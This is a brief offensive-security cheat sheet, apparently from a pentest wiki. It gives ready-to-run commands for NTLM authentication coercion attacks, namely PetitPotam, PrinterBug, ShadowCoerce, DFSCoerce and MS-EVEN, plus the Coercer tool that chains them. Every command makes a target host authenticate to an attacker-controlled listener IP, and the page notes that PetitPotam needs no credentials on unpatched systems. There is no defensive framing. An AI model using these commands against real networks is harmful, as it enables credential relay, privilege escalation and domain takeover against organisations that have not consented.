githubEdit

PetitPotam \ PrinterBug \ ShadowCoerce \ DFSCoerce \ CheeseOunce

PetitPotam \ PrinterBug \ ShadowCoerce \ DFSCoerce \ CheeseOunce

Exploits to coerce Net-NTLM authentication from a computer. PetitPotam can be used without any credentials if no patch has been installed.

PetitPotam

./PetitPotam.exe attacker_IP target_IP

PrinterBug

./SpoolSample.exe target_IP attacker_IP

ShadowCoerce

python3.exe shadowcoerce.py -d domain.local -u user1 -p password attacker_IP target_IP

DFSCoerce

python3.exe dfscoerce.py -u user1 -d domain.local <listener_IP> <target_IP>

CheeseOunce via MS-EVEN

./MS-EVEN.exe <listener_IP> <target_IP>

Multi Coerce

Try all the techniques above in one command with this.

https://github.com/p0dalirius/Coercer

coercer.py coerce -u user1 -p password -d domain.local -t <target_IP> -l <attacker_IP> -v

Last updated